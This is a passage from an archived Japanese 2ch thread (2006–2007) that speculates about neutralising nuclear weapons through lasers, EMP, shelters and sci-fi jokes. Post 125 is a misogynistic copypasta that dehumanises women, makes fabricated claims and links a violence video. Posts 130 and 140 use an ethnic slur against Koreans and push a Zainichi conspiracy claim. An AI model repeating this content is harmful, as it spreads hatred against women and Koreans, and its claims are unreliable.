一方的に蹂躙されれば「戦争」にならない!核攻撃も迎撃、反撃しなければ「核戦争」にならない!すばらしいアイデアじゃないか!


はぁ・・・

120 :オーバーテクナナシー:2006/12/29(金) 12:11:12 ID:ZRStpSNU
・・・鏡

121 :オーバーテクナナシー:2006/12/29(金) 12:23:03 ID:v0JS7OJw
ゴジラの熱戦を防ぐファイアーミラーがあれば核爆発も恐れるに値しない。

122 :オーバーテクナナシー:2006/12/29(金) 12:37:44 ID:8rYuQCuD
教育の見直しに乗じて、学校の体育の授業に聖闘士の格闘術を取り入れよう!
コスモを爆発させて闘う術を身に付ければ、核兵器も怖くはない。

123 :オーバーテクナナシー:2006/12/29(金) 13:08:28 ID:ZRStpSNU
救世主の名はミラーマン

124 :オーバーテクナナシー:2006/12/29(金) 15:41:02 ID:UKKKxo6r
皆さんは武士の鏡です。

125 :オーバーテクナナシー:2006/12/29(金) 17:15:14 ID:ItGM7VAG
男性諸君、結婚すると不幸になる。幸せにして当たり前で感謝無し。都合の良い奴隷としてだけ感謝され、搾り取って用済みになればゴミ箱へポイ♪
女の外面は綺麗で清潔で良い人、内面はずるくて汚いため、口も悪い+薄情+嘘+女同士も上辺仲良し裏では悪口三昧
女の成分はA(性悪陰湿残忍+損得自己中感情)+B(良い女演技+体形+整形化粧+ファッション)
↑良い女演技は好きな男>>異次元>>男集団>他人の順に良くなる。年齢とともにBのメッキがはがれ内外ともに醜くなる(Aの良い女は極少数)
女は「人生の不良債権、北朝鮮、金メッキを施したゴキブリ」
男女は対等で平等。男が女を養ったり守る必要はない「見切れ!見切り千両!私不幸なの?嘘!泣いてます?演技!情けは不要!つけこまれるぞ」
女は社会的優遇、過剰な法的保護、仕事と家庭の二束のわらじを得て、女尊男卑〜結婚しようとする君を彼女は陰で小馬鹿にしている事でしょう〜

★結婚は保留し、沢山の女と自由に恋愛(sex)を楽しめ♪★避妊必須
★捨てた女は優しい真面目男が結婚(残飯処理)してくれるさw★

それでも結婚する君へ究極護身法→[夫婦財産契約登記]
夫婦財産契約により、自分の稼いだ財産はすべて自分の物

弱い者いじめは最低と言いつつ、赤ちゃんを殺す母親(そして無罪判決(笑
狙撃は女子のほうが強い。男は、ノイローゼになってやめてしまうが
女は何人殺してもノイローゼにならない。骨盤が安定しているため等

ナチスの拷問で、女の拷問の残虐非道さを見て、拷問をしていた男達もひいたという
拷問しながら楽しそうに笑みをうかべていたそうだ。罪悪感や引け目が無い

・有史以前が女尊男卑の時代だったことを指摘したのは、スイスの学者バッハオーフィン
アマゾン女族の女王は、法律を定め、男達には卑しい奴隷の仕事を課した
男児が生まれたら、生き埋めにするか、脚と腕を不自由にして、戦えなくし奴隷とした
・王位継承権が女性にだけあった古代エジプトでは女性権力が非常に大きかった
・日本でも卑弥呼が女王
http://kr.img.dc.yahoo.com/b1/data/dci_etc/76.wmv ←女集団が、女一人をリンチしている動画(執拗に蹴り続けながら皆楽しんでる

女は虐げられてきた?父系社会など人類の歴史から見ればほんのわずかな期間に過ぎない。むしろ・・

126 :オーバーテクナナシー:2006/12/29(金) 18:41:52 ID:pms4K9Co
超巨大な核シェルターで国を丸ごと覆うとか・・
それか、住む家を全部、核シェルターに変える。
それか、宇宙服のような感じで
核爆発に耐えられる服を開発する。

あと未来リモコンスレ 書き込みよろしく
http://science4.2ch.net/test/read.cgi/future/1166936785/

127 :オーバーテクナナシー:2006/12/29(金) 21:36:40 ID:UKKKxo6r
 人工衛星から日本の国土全体にリンカーン、金日成、毛沢東など
核兵器保有国にとって無視できない肖像画を投影する。
 キリスト、ムハンマド、仏陀なども加えると良いだろう。

128 :コナン:2006/12/29(金) 23:13:05 ID:b2h5Z3OX
そうか、わかったぞ核を無力化する方法が!

核は所詮、抑止力。核を上回る抑止力を持つ兵器があれば
核を無力化できるものと考えられないだろうか
そして折れが考えた核を越える兵器…それは
「隕石」だ!  なんとかして適当な小惑星をピンポイントで
地球上に自在に落とせる技術を確立できれば、それは核以上の抑止力を持つといえる!
なんせ軍隊も地下施設も何もかもこれには無力だからな。世界は跪く!
これはさすがに誰も思いつかんだろ。折れはなんて頭いいんだ〜

129 :オーバーテクナナシー:2006/12/30(土) 00:29:52 ID:C82E01tl
「なんとかして」って思いっきり他人任せにしているのに頭いいって・・・

130 :オーバーテクナナシー:2006/12/31(日) 01:49:50 ID:KwWkAKbi
>>15
つチョン

日本の政治家がすべて日本のために頑張るわけないだろ。
自分の利益や民族のためにがんばるんだよ。
在日だったら、在日が暮らしやすいようにな政策をうちだすわけよ。

131 :オーバーテクナナシー:2006/12/31(日) 02:20:32 ID:6p42eTb0
現代の超高層ビル、六本木ヒルズとかは核兵器の攻撃を受けたらどうなるんだろうね。
倒れるかな。それともびくともしないか。
水爆だと駄目だと思うけど。
核弾頭ミサイルが近くで爆発した場合はどうだろ。


132 :オーバーテクナナシー:2006/12/31(日) 04:58:42 ID:COvgsMmL
真上で爆発したら倒壊というより曲がるんじゃないかな。
地面がえぐりとられた場合はその限りじゃないけど。

133 :オーバーテクナナシー:2007/01/02(火) 22:06:49 ID:VhfdrgP4
放射能のことを考えると爆発前になんとかしたいが…

134 :オーバーテクナナシー:2007/01/03(水) 07:40:56 ID:l0wnkdnf
ビルのコンクリートで、放射線をある程度遮蔽できないものかな。
鉄板・鉛で囲われたシェルターじゃないとやっぱり駄目かな。


135 :オーバーテクナナシー:2007/01/03(水) 10:29:31 ID:SuXwMnNm

>>134
鉄板程度じゃ放射能は通過しちゃう

136 :オーバーテクナナシー:2007/01/03(水) 12:41:39 ID:o4d3gE3D
>>135
曲がりなりにも科学系板なんだから・・・。


137 :オーバーテクナナシー:2007/01/03(水) 17:07:54 ID:aPy0Awm2
現用の核兵器に対応できる放射線シールドってどのぐらいの厚さになるっけ?

138 :オーバーテクナナシー:2007/01/04(木) 03:16:14 ID:eD7A+IEk
一番厄介な中性子線を抑える程度のコンクリート厚。

139 :オーバーテクナナシー:2007/01/04(木) 17:29:21 ID:SUB9ojpB
とにかく入信しましょう。
話はそれからです。

140 :オーバーテクナナシー:2007/01/06(土) 23:47:08 ID:E+IKPVvP
>>1
今米軍は必死にビーム兵器を開発している。近い将来ICBMは無効となるのは確実。
テポドンが発射された瞬間に衛星兵器が墜ち落とす・・までもなく、正日と正男を焼き豚暗殺すればいいか。
アメリカに刃向かう奴らは全員殺される時代がもうすぐそこまで来ていますよ。
パック3なんぞチョンの馬鹿将軍に淡い期待を持たせる為の子供騙し。
つーか米経済を支え続ける為の日本からの献金みたいなモンなんだけどね実際。

141 :オーバーテクナナシー:2007/01/07(日) 00:09:51 ID:K2RpyP8V
レーザー兵器でICBMが無力化した世界が来たらどうなるんだろう。
当然、核攻撃が無効になるから核の傘は無くなるね。

そうなると、局地戦による全面戦争でまた大戦に突入するんだろうな。

レーザー兵器による地上攻撃なんかも想定しないといけなくなるな。
航空機や艦船によるレーザー攻撃も有りうる。
衛星からのレーザー攻撃も有るから、宇宙空間も含めた防衛が
必要な時代に突入するな。


142 :オーバーテクナナシー:2007/01/07(日) 08:54:08 ID:/zwW9bpB
日本はレーザー兵器作れる技術あるのか?

143 :オーバーテクナナシー:2007/01/07(日) 09:07:32 ID:2SgqBna7
>>140
下記の理由とリアルタイム偵察&照準の難しさもあって、地上攻撃用の衛星レーザーは難しいんじゃないか。
それに必死に研究してるのは航空機搭載型レーザーだし。

>>141
船や航空機みたいなものはともかく、宇宙空間で地上攻撃兵器として使えるかはわからんな。超大型衛星を作るか、冷却専用衛星でも作らなきゃ使い捨てになりそうだから。
大規模になりすぎてSDIの二の舞になりそうだ。

>>142
精度の高いレンズがなければ高強度レーザーが作れずレーザー核融合の試験も出来ないから無くは無いと思う。
でも兵器として昇華できるかは微妙。

144 :オーバーテクナナシー:2007/01/07(日) 11:53:55 ID:K2RpyP8V
レーザー放つ戦車クル━━━━━━(゚∀゚)━━━━━━ !!


145 :オーバーテクナナシー:2007/01/07(日) 11:56:46 ID:2SgqBna7
いやレーザーなんて今時の戦車ならはなってますがな。
YAGやルビーの測距レーザーだけど。

146 :オーバーテクナナシー:2007/01/07(日) 12:00:18 ID:K2RpyP8V
射程の問題からこうなるかな。

 衛星レーザー→×←衛星レーザー
  ↓  
 航空機レーザー←┐
  ↓          ↑    
戦車レーザー 対空レーザー

147 :オーバーテクナナシー:2007/01/09(火) 20:29:51 ID:Rfr5g+if
結論を言うと
核の無力化は現実的には

不 可 能 に 近 い

ってことか 

148 :オーバーテクナナシー:2007/01/09(火) 20:39:59 ID:g1B5MZc0
全面核戦争レベルでの打ち合いに対してはって前提が付くがな。
それも時間が経つにつれて徐々に解消していきそうだが。

149 :オーバーテクナナシー:2007/01/11(木) 02:06:48 ID:o2Rc9pEK
レーザーを500基とか1000基とか設置できれば、
ICBMの撃ち合いにも対応できると思う。
そうなると、空中は隠れる場所のない危険な所となり、
地上の通常兵力による身を隠しながらの侵攻作戦しかなくなると思う。
射程10km程度のビーム自走砲による撃ち合いになる。
対地ミサイルはレーザーで破壊する。


150 :オーバーテクナナシー:2007/01/11(木) 07:50:42 ID:Thv4Ch3b
電子制御なら、強力な電磁波を照射して誤動作させれるんじゃないか?

151 :オーバーテクナナシー:2007/01/11(木) 13:59:37 ID:YSt69olj
>>148 >>149
あっしは割と悲観的です。現状では全然ダメ子ですしね(ペイトリオット
とかの防護範囲はランチャーを中心として弾体入射方向を長軸とした
幅数kmの非常に扁平率が高い長円形に過ぎません)。
迎撃装備の性能が上がれば人口密集地帯の防護力は上がるでしょうが、
核分裂系の汚い弾頭で人口密度が低い食糧生産地帯を狙われたらとても
守り切れません。死に方が被爆死じゃなくて餓死になるだけですね、
世界的に大戦争になっちゃったら。
>>149
大気圏中の大出力レーザービームは大気をイオン化することにより
急速にエネルギーを失うので、兵器としては使えません。もうちょっと
物理学を勉強しましょう。
>>150
それはEMPを利用した初期のABMですね。最近の戦略兵器は起爆系が
完全シールドされているのでEMPはあまり効果がないと言われています。
一方、物理的には再突入の際の断熱セラミックシールド程度しかないので、
直接ブチ当てて迎撃しようというアイディアが出てくるわけですね。
(戦略核ミサイルのMIRVの場合)

152 :オーバーテクナナシー:2007/01/11(木) 21:15:32 ID:Thv4Ch3b
忘れるな
俺たちには、スネークがついている

いや、ぶっちゃけ本当の意味で核を無効化できるのって政治力か工作員ぐらいだとおもう

153 :オーバーテクナナシー:2007/01/11(木) 21:33:19 ID:XHudNpFx
http://www.google.co.jp/search?hl=ja&q=%E3%83%93%E3%83%BC%E3%83%A0%E3%83%9E%E3%82%A4%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%AF%E3%83%A9%E3%83%B3%E3%83%96%E3%83%A9%E3%83%BC&lr=

154 :オーバーテクナナシー:2007/01/11(木) 22:23:45 ID:FZgSjdQl
>>1
想像するんだ
天国なんて無いんだと

155 :オーバーテクナナシー:2007/01/12(金) 10:38:18 ID:Ev+dVvxI
>>151
対空赤外線レーザー
http://www.youtube.com/watch?v=IcmI6UnR4gg

これを応用してこういう構想とかあるけど。
http://www.youtube.com/watch?v=hZ5e1PuCZEc

ダーティーボム対策としては、東京の地下核シェルターに
水耕栽培工場を建設しておくことで、人口の何割かは
生き残れる。そこだけPAC3でガチガチに防御しておけば。


156 :トレッキーテクラート:2007/01/13(土) 23:03:46 ID:H/JoWy2P
スタートレックで出てきた核反応を無効化できる物質を開発するしかない
(太陽に放り込むと核融合が停止して太陽は爆縮する)
そういう物でも開発しない限り無理じゃないか?

157 :オーバーテクナナシー:2007/01/14(日) 01:10:55 ID:cA/Rs167
>>150
EMPでミサイルの電子部品を破壊する事は可能とおも。

158 :オーバーテクナナシー:2007/01/15(月) 12:51:21 ID:XaPcpLoH
反物質砲

159 :オーバーテクナナシー:2007/01/15(月) 16:04:45 ID:D+vU3RDc
ミノフスキー粒子

160 :オーバーテクナナシー:2007/01/15(月) 16:08:03 ID:XExtG+qg
ミサイルコマンド

161 :オーバーテクナナシー:2007/01/15(月) 16:11:05 ID:CKIMpYyM
>>160
真理にたどり着いちゃった

162 :オーバーテクナナシー:2007/01/16(火) 15:03:59 ID:FvN+hrAS
特攻隊カミカゼ

163 :オーバーテクナナシー:2007/01/16(火) 15:43:01 ID:KeN9ff4V
重力爆弾で爆発と放射能を圧縮する

164 :オーバーテクナナシー:2007/01/16(火) 18:08:26 ID:gFOaaw9M
ザフトのNジャマー

165 :オーバーテクナナシー:2007/01/22(月) 16:22:36 ID:zq+tEaPh
>>125
アマゾン女族ってこれだろ↓
http://members3.jcom.home.ne.jp/dandy2/works/works_14_2_b.html

166 :オーバーテクナナシー:2007/01/25(木) 23:00:56 ID:MgZuVqk4
ノーガード戦法

167 :オーバーテクナナシー:2007/01/27(土) 09:40:03 ID:7ktnLI9K
国民全員、日本を放棄する

168 :オーバーテクナナシー:2007/01/27(土) 22:50:55 ID:pCIwr0CP
攻殻みたいな放射能除去技術が出てくるかな

169 :オーバーテクナナシー:2007/01/27(土) 23:01:32 ID:Q1Mwy2TK
分子工学どころか、素粒子工学までいきつかないと除去できないからな。

170 :オーバーテクナナシー:2007/01/27(土) 23:53:49 ID:6MH6MBI3
森議員が統一を陰で操る!

下から罪罰ブログへ
http://9186.hito.thebbs.jp/resume.html

171 :オーバーテクナナシー:2007/01/30(火) 00:38:53 ID:/5vMT6Bq
>>155
水耕農場はいいんですけど、地下に設置する場合光源のためのエネルギー源が
必要なわけでして、それどうします?

大昔に反核ヒステリー共(個人的にこいつら大嫌いなんですが)が「皇居の地下に
原発を!」とかいう本を出したと思うんですが、その道行きます?

>>169
素粒子いじっても無理だと思うよ。そっちの方は俺は学部レベルだから
X線までしか触ってないけど。

だいたい、核分裂ベースで言うと、商用分裂炉くらいの燃料濃度(数%)だと、
中性子は適宜減速してやらないと反応が継続しない。これを逆手に取ったのが
日本の原発で多用されているBWRだろう?ヴォイド効果って奴。

核兵器用(90%とか)に濃縮しちまうと、そんなの関係なくなる。とりあえずは
爆発する。

入射中性子のエネルギーと核の分裂確率は「速けりゃいいってもんじゃない」
という世界で(運が悪けりゃ突き抜けて終わり)、民生用反応炉のレベルじゃ
「適宜中性子を減速してやらないとダメ」なんですよ。

172 :オーバーテクナナシー:2007/01/30(火) 20:32:13 ID:PxxlXR4L
ATフィールド

173 :オーバーテクナナシー:2007/01/30(火) 20:53:19 ID:u8UqknR0
>>172
それがあったか!

174 :オーバーテクナナシー:2007/01/30(火) 21:35:19 ID:SOFeyrVE
今後auの主力機種のプランが1xプラよりも安くならなきゃ今後au使うかわからん。

ドコモと料金変わらない状況ならやっぱりドコモでしょ。

ソフトバンクのほうが安くすむならソフトバンクもありでしょ。

175 :オーバーテクナナシー:2007/01/30(火) 21:36:47 ID:r8Paghmr
どこの誤爆よ

176 :オーバーテクナナシー:2007/01/31(水) 20:31:40 ID:kjDyyVrf
アメリカさんはレーザー砲実験施設のために原発3基建てましたからね。
目標は原子力空母を応用した原子力レーザー砲艦(戦艦)だとか。

177 :オーバーテクナナシー:2007/02/02(金) 23:17:53 ID:vTuJPuqf
すげぇぇぇぇぇ。
原子力レーザー砲鑑って凄すぎるなw


178 :オーバーテクナナシー:2007/02/02(金) 23:20:02 ID:vTuJPuqf
サイコガンダムか宇宙戦艦ヤマトか。


46 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)